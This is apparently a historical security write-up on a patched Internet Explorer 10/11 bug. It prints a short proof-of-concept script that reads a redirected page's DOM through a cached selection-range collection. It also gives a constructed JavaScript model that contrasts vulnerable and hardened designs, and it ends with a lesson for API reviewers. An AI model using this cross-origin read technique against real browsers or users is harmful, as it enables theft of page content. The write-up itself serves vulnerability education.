Saving a reference to a createRangeCollection() result before a redirect, then accessing the collection member’s htmlText property after the redirect completes, gives access to the DOM of the redirected page. The technique follows the same cached-collection pattern as the earlier bugs but uses the selection range API.

    var rngColl;

    function main() {
        var win = window.open("redirect.aspx", "", "width=400,height=400");
        win.setTimeout('alert("Please, don\'t close this alert");');
        win.document.appendChild(win.document.createElement("body"));
        rngColl = win.document.selection.createRangeCollection(); // Save a createRange collection.
        setTimeout("accessRange()", 2000);
    }

    function accessRange() {
        try {
            alert(rngColl[0]);
        } catch (e) {
            alert(rngColl[0].htmlText); // Access the createRange collection after redirect.
        }
    }

The alert keeps the window alive long enough for the redirect to complete, after which rngColl[0].htmlText returns the inner HTML of the redirected page’s document. The first access (in the try block) throws; the second (in the catch block) succeeds. Tested on IE10 / IE11 build 20130312-2100.
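
The cached-reference pattern and its fix can be shown with a simplified model. This is an added example, not code from the original post and not IE's implementation: the classes Doc, Win, CachedRangeVulnerable and CachedRangeHardened and the example origins are all constructed for illustration, and the post does not describe how the browser handled this internally.

```javascript
// Simplified model (assumption): illustrates the bug class, not IE internals.
class Doc {
  constructor(origin, html) { this.origin = origin; this.html = html; }
}
class Win {
  constructor(doc) { this.document = doc; }
  navigate(doc) { this.document = doc; } // a redirect replaces the document
}

// Vulnerable shape: access is authorized once, when the object is created.
// Later reads follow the window to whatever document it holds now.
class CachedRangeVulnerable {
  constructor(win, callerOrigin) {
    if (win.document.origin !== callerOrigin) throw new Error("access denied");
    this.win = win;
  }
  get htmlText() { return this.win.document.html; }
}

// Hardened shape: the object is pinned to the document it was created from,
// and both the pin and the caller's origin are re-checked on every access.
class CachedRangeHardened {
  constructor(win, callerOrigin) {
    this.win = win;
    this.doc = win.document;
    this.callerOrigin = callerOrigin;
    this.check();
  }
  check() {
    if (this.win.document !== this.doc) throw new Error("stale range: document replaced");
    if (this.doc.origin !== this.callerOrigin) throw new Error("access denied");
  }
  get htmlText() { this.check(); return this.doc.html; }
}

// Cache a range, navigate the window to another origin, then read the range.
function demo(RangeClass) {
  const caller = "https://a.example"; // constructed origins
  const win = new Win(new Doc(caller, "<body></body>"));
  const range = new RangeClass(win, caller); // cached before the redirect
  win.navigate(new Doc("https://b.example", "<body>other-origin content</body>"));
  try { return { leaked: true, value: range.htmlText }; }
  catch (e) { return { leaked: false, value: e.message }; }
}
```

The point for reviewers of similar APIs: any object that outlives a navigation needs its security context validated at access time, not only at creation time.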
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.